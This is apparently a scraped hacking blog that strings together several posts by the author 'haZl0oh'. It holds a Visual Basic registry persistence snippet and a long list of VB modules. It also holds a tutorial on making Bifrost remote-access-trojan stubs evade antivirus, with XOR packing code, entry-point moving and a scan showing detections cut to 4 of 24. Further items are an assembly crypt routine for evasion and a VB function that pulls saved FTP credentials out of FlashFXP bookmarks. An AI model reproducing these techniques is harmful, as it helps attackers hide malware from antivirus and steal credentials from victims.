haZl0oh
mr52
exidous
abhe
Public Sub starter()
Dim Reg As Object
Set Reg = CreateObject(“wscript.shell”) ‘This code and the code below writes this “program” to the reigstry
Reg.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES\” & App.Path & “\” & App.EXEName & “.exe”‘This code would place file wherever depending on path. After, name watever ext. ‘.exe’
End Sub
Filed under: Visual Basic
LIST:
190 Mods\ADVAPI32.BAS
190 Mods\API.bas
190 Mods\Autocomplete.bas
190 Mods\basAPI.bas
190 Mods\basCVMK.bas
190 Mods\Base Convert.bas
190 Mods\basEquation.bas
190 Mods\basFile.bas
190 Mods\basGDI.bas
190 Mods\basJoyStick.bas
190 Mods\basMapping.bas
190 Mods\basMath.bas
190 Mods\basMisc.bas
190 Mods\basMouse.bas
190 Mods\basNet.bas
190 Mods\basSendMessage.bas
190 Mods\basSound.bas
190 Mods\basString.Bas
190 Mods\basTrayIcon.bas
190 Mods\basutils.bas
190 Mods\BASWRKPD.BAS
190 Mods\BeatThi.bas
190 Mods\BinWorks.bas
190 Mods\CardSupport.bas
190 Mods\CD Audio.bas
190 Mods\cdread.BAS
190 Mods\CHAT.BAS
190 Mods\Comctl32.bas
190 Mods\COMDLG32.BAS
190 Mods\Common Dialog No OCX.bas
190 Mods\Common Dialog.bas
190 Mods\COMMON.BAS
190 Mods\ComplexMath.bas
190 Mods\Control Panel.bas
190 Mods\Contxtid.bas
190 Mods\Converts.bas
190 Mods\convertstring.bas
190 Mods\Copy of Nebular.bas
190 Mods\COPY(2~2.BAS
190 Mods\core-api.bas
190 Mods\CountVowels.bas
190 Mods\CreateGradient.bas
190 Mods\DATOS.bas
190 Mods\DBgrid MouseDown.bas
190 Mods\Declarations.bas
190 Mods\Declare.bas
190 Mods\dos32.bas
190 Mods\dragdrop.bas
190 Mods\drives.bas
190 Mods\DX7Sound.bas
190 Mods\EASYSOUNDCONSTANTS.bas
190 Mods\Effects.bas
190 Mods\Emial.bas
190 Mods\feettoinch.bas
190 Mods\Fichiers.bas
190 Mods\FileFunctions.bas
190 Mods\FILEPROC.BAS
190 Mods\FINDWND.BAS
190 Mods\FLOAT_TB.BAS
190 Mods\flood fill graphic.bas
190 Mods\GameFunctions.bas
190 Mods\GDI32.BAS
190 Mods\General.bas
190 Mods\GetFree.bas
190 Mods\graphapp.bas
190 Mods\HackFile.bas
190 Mods\htmlmanager.bas
190 Mods\I.N.I.bas
190 Mods\Icon Tray With MsgHook.bas
190 Mods\IMM32.BAS
190 Mods\inifile.bas
190 Mods\internet.bas
190 Mods\IO.bas
190 Mods\isWinampRunning.bas
190 Mods\joystick position.bas
190 Mods\KERNEL32.BAS
190 Mods\Load Resources.bas
190 Mods\LoadResStrings.bas
190 Mods\LOCALIZE.BAS
190 Mods\LOGGING.BAS
190 Mods\LZ32.BAS
190 Mods\Main.bas
190 Mods\MAPIVB.BAS
190 Mods\MCI_REC.BAS
190 Mods\mCode.bas
190 Mods\mdlGeneral.bas
190 Mods\mdlMidi.bas
190 Mods\Messages.bas
190 Mods\mglobal.bas
190 Mods\MIDCONST.BAS
190 Mods\MIDI_CMD.BAS
190 Mods\MIDI_OUT.BAS
190 Mods\Mine.bas
190 Mods\MIXER.BAS
190 Mods\mMixer.bas
190 Mods\Mmreg.bas
190 Mods\MODAECON.BAS
190 Mods\MODAEGLB.BAS
190 Mods\modclassidgenerator.bas
190 Mods\MODCLNT.BAS
190 Mods\modCopy.bas
190 Mods\moderrorhandling.bas
190 Mods\MODEXPDT.BAS
190 Mods\modGradient.bas
190 Mods\MODINSTR.BAS
190 Mods\modJay.bas
190 Mods\MODLOGGR.BAS
190 Mods\modLVConst.bas
190 Mods\modLVDeclare.bas
190 Mods\modMake.bas
190 Mods\modMP3Header.bas
190 Mods\modMunir.bas
190 Mods\MODPOOL.BAS
190 Mods\ModProVivo.bas
190 Mods\MODQUEUE.BAS
190 Mods\modSelfExtract.bas
190 Mods\MODSERVC.BAS
190 Mods\MODSHELL.BAS
190 Mods\modShellExecute.bas
190 Mods\modSplitter.bas
190 Mods\modTranslate.bas
190 Mods\Modul.bas
190 Mods\Module1.bas
190 Mods\Module2.bas
190 Mods\ModuleComplexMath.bas
190 Mods\MODVBERR.BAS
190 Mods\modWave.bas
190 Mods\modWaveHeader.bas
190 Mods\MODWINER.BAS
190 Mods\MODWORKR.BAS
190 Mods\mp3.bas
190 Mods\MPR32.BAS
190 Mods\MS Volume Declarations.bas
190 Mods\MS Volume Declarations2.bas
190 Mods\mTest.bas
190 Mods\MTSSVC.BAS
190 Mods\multimedia.bas
190 Mods\Nebular.bas
190 Mods\NETAPI32.BAS
190 Mods\ocx.bas
190 Mods\ODBCAPI.BAS
190 Mods\ODBCAPI2.bas
190 Mods\OpenFile soundfile.bas
190 Mods\PBarDefs.bas
190 Mods\PIANO.BAS
190 Mods\ProcedureBuilder.bas
190 Mods\ProgBar.bas
190 Mods\Progress.bas
190 Mods\Read cookie.BAS
190 Mods\RECEDIT.BAS
190 Mods\Registry Access.bas
190 Mods\registry EDIT.bas
190 Mods\registry.bas
190 Mods\Save.bas
190 Mods\Secret.bas
190 Mods\SETUP1.BAS
190 Mods\SETUPRES.BAS
190 Mods\SHBrowse.bas
190 Mods\Shell Execute.bas
190 Mods\shell.bas
190 Mods\SHELL32.BAS
190 Mods\SHFInfo.Bas
190 Mods\sleep.bas
190 Mods\SoundMeter.bas
190 Mods\SOURCE.BAS
190 Mods\StrCrypt.bas
190 Mods\Strings.bas
190 Mods\systray.bas
190 Mods\tab.bas
190 Mods\texteffects.bas
190 Mods\timer.bas
190 Mods\TimeSetupDeclarations.bas
190 Mods\USER32.BAS
190 Mods\UTILITY.BAS
190 Mods\VALID.BAS
190 Mods\VbBusObjMod.bas
190 Mods\vbiserv.bas
190 Mods\VBSQL.BAS
190 Mods\VBSYXGBL.BAS
190 Mods\VERSION.BAS
190 Mods\Volmix.bas
190 Mods\Volume Set.bas
190 Mods\vumodule.bas
190 Mods\WAVEFORMAT.bas
190 Mods\WAVEMIX.BAS
190 Mods\WAVEMIX32.bas
190 Mods\waveplay.bas
190 Mods\WAVMIX.bas
190 Mods\Win95 Functions.bas
190 Mods\WinampModule.bas
190 Mods\WinampModule2.bas
190 Mods\WinDecl.bas
190 Mods\windows.bas
190 Mods\WINMM32.BAS
190 Mods\WINSPOOL.BAS
190 Mods\WIZARD.BAS
How to undetect Bifrost stubs the manual way by haZl0oh !
Ok guys ….
first of all ya need following tools/stuff…
- Reshacker
- Some icon of your choose
- some handy hexeditor ( your favourite )
- Some example PE file ( i choosed the bifrost client )
in this example i took the bifrost 1.2d stub
novirusthx scan
was 23/24
1. change the icon
take reshacker and drag and drop your stub file into it.
goto icon group ressource and open it …
change the icon to your favourite one
( better take one who isn´t often seen in malware )
save it and step one is done….
2. open your pe file you choose … in my case bifrost client
put this into reshacker and save your version info ressource
to a file…
now close reshacker open it again an drag n drop your stub into it again….
now action >>>> add a new ressoure
open your saved version info ressource
ressource type : version info
ressource name : 1
ressource language : 1033
save it … done
3.
add a visual maniferst into your stub
do it with tools w2ho are abled to or do it again with resshacker ( by the way …awesome tool like ya see …lol)
now when ya added your visual manifest
4.
add some bytes with your hexeditor
i gave 200 bytes @ the end of file …..
works for my choose yaself
i also changed the 00 from offset 230 till 3ff to 11….
now after all these things the heavyest step comes ….
lol
maybe …
MANUAL Packing & EP Moving!!!
5.
some days ago i drove by car and badabang .. i had an idea
why dont xor a file from back to start ?!?!?!?
i tried and it worked for me….
Code:
so my code is very easy :
( call it a beginner code )
xor bl,bl
mov esi, "end address of the code are you want to pack"
dec bl
xor byte ptr ds:[esi],bl <<<< ****
dec esi
cmp esi, " start adress of the code ya wanna pack"
JGE "address of xor byte ptr ds:[eax],bl" ****
call "address of real OEP"
ret
now move your new ep into the image import descriptor range
it looks like these here:
========================================
00407D90 . CC7D0000 DD 00007DCC ; Struct ‘IMAGE_IMPORT_DESCRIPTOR’
00407D94 > $ B8 AA7E4000 MOV EAX,jmp_eax_.00407EAA <<<< my EP
00407D99 ? FFE0 JMP EAX
00407D9B ? 90 NOP
00407D9C . 2E7E0000 DD 00007E2E
00407DA0 . 00100000 DD 00001000
00407DA4 . F07D0000 DD 00007DF0 ; Struct ‘IMAGE_IMPORT_DESCRIPTOR’
00407DA8 . 00000000 DD 00000000
00407DAC . 00000000 DD 00000000
00407DB0 . 4A7E0000 DD 00007E4A
00407DB4 . 24100000 DD 00001024
00407DB8 . 00000000 DD 00000000 ; Struct ‘IMAGE_IMPORT_DESCRIPTOR’
00407DBC . 00000000 DD 00000000
00407DC0 . 00000000 DD 00000000
00407DC4 . 00000000 DD 00000000
00407DC8 . 00000000 DD 00000000
======================================
run your xor code and then save your new UD stub !!!
now plce the entrypoint in lord pe to the place where YOU placed ya NEW EP
my one was here "00407D94"
and it´s done with these easy steps your stub is almost to any AV undetected
i scanned my one and it was ..:
File Info
Report generated: 24.1.2009 at 23.27.26 (GMT 1)
Filename: 123.exe
File size: 80 KB
MD5 Hash: 980763A46F83883B1CAD7558411A5557
SHA1 Hash: B927C0FDA27210C59F366F2167866832B0430374
Packer detected: PEncrypt 3.1 Final -> junkcode [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 4 on 24
Detections
a-squared – Nothing found!
Avira AntiVir – Nothing found!
Avast – Nothing found!
AVG – Nothing found!
BitDefender – GenPack:RAT.Spy.Banker.AAUT
ClamAV – Nothing found!
Comodo – Nothing found!
Dr.Web – Nothing found!
Ewido – Nothing found!
F-PROT 6 – W32/Midgare.A.gen!Eldorado
G DATA – Nothing found!
IkarusT3 – Nothing found!
Kaspersky – Nothing found!
McAfee – Nothing found!
MHR (Malware Hash Registry) – Nothing found!
NOD32 v3 – Win32/Bifrose.NFJ
Norman – Nothing found!
Panda – Nothing found!
Quick Heal – Nothing found!
Solo Antivirus – Nothing found!
Sophos – Nothing found!
TrendMicro – Nothing found!
VBA32 – RAT.Win32.Midgare.hhn
Virus Buster – Nothing found!
xor eax,eax
mov ebx, 0×77e61bea ;address of Sleep
mov ax, 5000 ;pause for 5000ms
push eax
call ebx ;Sleep(ms);
maybe helpfull
should make some undetected ( in combination with crypt routine )
haZl0oh
Filed under: Assembler, Developement, Information, Tutorials, Undetecting / reversing
lods Routine ( xor ) MANUAL PACKING
xor eax, eax
xor ebx, ebx
mov esi, *start adress of your code to crypt*
mov edi, esi
start:
lodsb
add bl, 25 ; changeable!
add bh, 33 ; changeable!!
add ah, 23 ; changeable!!
add al, ah
xor al, bl
sub al, bh
stosb
cmp esi, *end adress of your code to crypt*
jle start
jmp OEP
also pasted HERE
haZl0oh
Filed under: Assembler, Developement, Information, Tutorials, Undetecting / reversing
Here is some tutorial by myself hope some beginners will like it ….
some different ways to move the entrypoint of an standard PE executable ….
haZl0oh
DONT COPY FROM HERE ^^
USE PASTEBIN.COM LINK BELOW
Code:
‘Parse FlashFxp Bookmarks
‘© haZl0oh | H7LABS.COM
‘2oo9
Function ParseBookmark(Path As String) As String
Dim Content As String
Open Path For Binary Access Read As #1
Content = Space(LOF(1) – 4)
Content = Right(Content, Len(Content) – 25)
Get #1, , Content
Close #1
Content = Replace(Content, “”, “”)
Content = Replace(Content, “”"”, “”)
Content = Replace(Content, “<password>”, “Password: “)
Content = Replace(Content, “<name>”, “Name: “)
Content = Replace(Content, “</name>”, “”)
Content = Replace(Content, “<remotepath>”, “Remotepath: “)
Content = Replace(Content, “</remotepath>”, “”)
Content = Replace(Content, “<localpath>”, “Localpath: “)
Content = Replace(Content, “</localpath>”, “”)
Content = Replace(Content, “<passive>”, “Passive: “)
Content = Replace(Content, “</passive>”, “”)
Content = Replace(Content, “<ssl>”, “ssl: “)
Content = Replace(Content, “</ssl>”, “”)
Content = Replace(Content, “<?xml version=1.0 encoding=UTF-8?>”, “”)
Content = Replace(Content, “<sites version=1.0>”, “”)
Content = Replace(Content, “>”, “”)
Content = Replace(Content, “port”, “Port: “)
Content = Replace(Content, “<”, “”)
Content = Replace(Content, “/”, “”)
Content = Replace(Content, “</ssl>”, “”)
Content = Replace(Content, “<ssl>”, “”)
Content = Replace(Content, “site”, “”)
Content = Replace(Content, “username”, “Username: “)
Content = Replace(Content, “username”, “Username: “)
ParseBookmark = Content
End Function
